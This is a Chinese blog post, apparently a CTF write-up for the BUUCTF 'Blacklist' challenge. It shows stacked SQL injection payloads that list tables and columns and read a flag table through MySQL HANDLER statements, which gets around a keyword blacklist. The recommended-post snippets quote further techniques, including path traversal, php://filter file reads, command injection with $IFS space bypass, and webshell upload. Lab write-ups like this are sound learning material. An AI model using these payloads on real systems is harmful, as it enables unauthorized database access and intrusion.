第三十二题——[GYCTF2020]Blacklist

最新推荐文章于 2023-04-01 16:36:24 发布
最新推荐文章于 2023-04-01 16:36:24 发布
阅读量124 收藏
点赞数
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/115868809
版权
题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,看到输入栏,猜测使用sql注入

在这里插入图片描述

第二步:使用order by,union select,updata获取回显字段,发现被拦截

在这里插入图片描述

第三步:尝试堆叠注入,输入1';show tables#发现提示flag

在这里插入图片描述

第四步:输入1';show columns from FlagHere;#查看FlagHere字段发现flag

在这里插入图片描述

第五步:获取flag

由于本次屏蔽的关键字很多,所以解锁新姿势使用HANDLER
输入1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#查看FlagHere的第一数据
在这里插入图片描述

想学习安全的小白
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF[Web 1](SQL注入1)
夜思红尘的博客
06-22 318
这里是关于网络安全之SQL注入的练习,这里SQL是一个十分危险的漏洞,因此我们要注重有关于SQL注入的防御,同时欢迎大家前来阅读!
sql跨库注入
小飒的博客
06-07 269
靶场:https://buuoj.cn/challenges 的sqli-labsL1:首先看有什么数据库 完整url: 选择“ctftraining”数据库 选择名为flag的table 查询内容 采用报错注入步骤是类似的,最后flag显示不全
sql注入靶场练习
akxnxbshai的博客
04-01 581
远古素材,图床炸了一次后就没交,今天没事就改一下。
Web 渗透(三)
0xac001d09
05-20 837
[BJDCTF2020]Easy MD5–ffifdyop+弱类型比较 步骤一:ffifdyop 字符串 提交两次没反应,上 burp GET /leveldo4.php?password=123 HTTP/1.1 Host: 3b74d3ab-4e56-4c99-b522-35a4985ebe8f.node4.buuoj.cn:81 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7
android_system_blacklist_android_msm8610_
10-03
在Android系统中,"android_system_blacklist_android_msm8610_"可能指的是针对特定硬件平台MSM8610的黑名单配置或者安全更新。MSM8610是高通公司生产的一款移动处理器,主要面向中低端智能手机和平板电脑市场。这个...
ipset-blacklist:一个bash脚本,禁止在黑名单中发布大量IP地址
02-05
ipset-blacklist:一个bash脚本,禁止在黑名单中发布大量IP地址
DISCORD.JS-BlackList-UnBlackList:卸载清单DISCORD.JS BlackListUnBlackLis命令
02-18
:information: DISCORD.JS-BlackList-UnBlackLis 将清单中的内容输入到BlackList / UnBlackList命令中。 默西·德·莱塞尔 :star: (STAR)Si Vous L'avezutilisépour votre bot。 :laptop: 代码Voici评论进口商...
nss-blacklist:直接从 nss 将 dns 列入黑名单
07-23
【nss-blacklist:直接从nss将DNS列入黑名单】 nss-blacklist 是一个开源项目,旨在帮助用户通过 nss(Name Service Switch)库来直接将特定的 DNS(域名系统)地址加入黑名单,从而实现对网络请求的过滤。nss 是 ...
wordpress-comment-blacklist:WordPress评论垃圾邮件的简单解决方案
02-05
"wordpress-comment-blacklist" 是一个针对WordPress的解决方案,旨在帮助用户有效地阻止垃圾评论,提升用户体验,保护网站免受恶意攻击。 这个开源项目的核心在于创建和维护一个黑名单,包含可能的垃圾邮件关键词...
第1-63总结:URL提交参数获取flag篇
分享简单的安全技术
05-10 3775
第一种:使用目录穿越方法,提交参数时输入:xxxx?/…/…/…/…/flag,利用?/将xxx文件失效,解析到flag所在文档,eg:第一 第二种:使用filter协议读取文件,语句:php://filter/read=convert.base64-encode/resource=flag.php 第三种:执行ping命令时,使用|或;执行除ping命令外我们想要执行的命令 空格替换:采用$IPS$1代替空格 关键字替换,cat /flag=a=g;cat$IFS$1fla$a 第四种:利用空格绕过WA
第五十八——[极客大挑战 2019]FinalSQL
分享简单的安全技术
05-08 777
目地址:https://buuoj.cn/challenges 解思路 第一步:进入目,看到sql测试框,以及1,2,3,4,5超链接 第二步:测试漏洞点 点击1超链接后出现NO! Not this! Click others~~~字样,在URL地址栏添加^2后发现注入点 第三步:获取flag 由于^一般适用于盲注猜测ASCII码值,所以这里使用盲注获取flag 手动测试回显字样:输入http://d9cc6ff9-ac2f-4193-985d-dce132ad08bd.node3.buuoj.
第六十一——[MRCTF2020]Ezpop
分享简单的安全技术
05-08 688
目地址:https://buuoj.cn/challenges 解思路 第一步:进入目,显示出源码 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack
第五十四——[WUSTCTF2020]朴实无华
分享简单的安全技术
04-29 674
目地址:https://buuoj.cn/challenges 解思路 第一步:进入目,访问/robots.txt文件看到提示/fAke_f1agggg.php 第二步:访问/fAke_f1agggg.php,看到提示:/fl4g.php 第三步:访问/fl4g.php看到源码 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level
第四十二——[安洵杯 2019]easy_web
分享简单的安全技术
04-26 633
目地址:https://buuoj.cn/challenges 解思路 第一步:进入目,没有任何提示,但是看到URL中的img参数有点问 第二步:将img参数进行解密 先对其使用base64解密得到:MzUzNTM1MmU3MDZlNjc=,看着还有点像base64 再对其进行base64解密,得到:3535352e706e67,看着像hex编码 使用hex对其解码得到:555.png 按f12发现img标签后面的元素有一场,对其base64解码得到乱码,从乱码中猜测这个可能是555.png的内
第一——[HCTF 2018]WarmUp
分享简单的安全技术
03-31 581
目地址:https://buuoj.cn/challenges 解思路 第一步:进入目,迎面而来的是一张滑稽图片,按f12查看,发现提示:source.php 第二步:在URL一栏输入访问提示给出的php页面 http://c0717382-8c47-4aa3-b308-1972e1173f7a.node3.buuoj.cn/source.php 第三步:查看source.php页面给出的提示 <?php highlight_file(__FILE__); class emm
第三十——[MRCTF2020]你传你马呢
分享简单的安全技术
04-19 517
目地址:https://buuoj.cn/challenges 解思路, 第一步:进入目,看到文件上传提示,猜想使用一句话木马获取shell 第二步:上传.htaccess并使用burpsuite改包 .htaccess介绍:原文 .htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设
第四十五——[De1CTF 2019]SSRF Me
分享简单的安全技术
04-27 469
目地址:https://buuoj.cn/challenges 解思路 第一步:进入目,发现源码的乱码,整理后得到python的flask框架的源码,目提示flag in ./flag.txt #! /usr/bin/env python # #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os
第二十四——[ZJCTF 2019]NiZhuanSiWei
分享简单的安全技术
04-15 402
目地址:https://buuoj.cn/challenges 解思路 第一步:进入目,展示了php代码 第二步:使用data协议绕过text参数检测 经过代码分析,text参数不能为空,且根据text参数所指定的文件名字读取出来与字符串welcome to the zjctf进行比较。 使用data协议进行绕过文件读取,将welcome to the zjctf进行64编码后得到:d2VsY29tZSB0byB0aGUgempjdGY=,传入参数text=data://text/plain;ba
blacklist floppy
最新发布
06-28
很抱歉,"blacklist floppy"似乎不是一个标准命令或者术语,也没有直接关联到Python或者其他常见编程语言的操作。它看起来像是某种特定上下文或系统的操作,但没有足够的信息来提供详细的指导。如果你是在询问如何在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值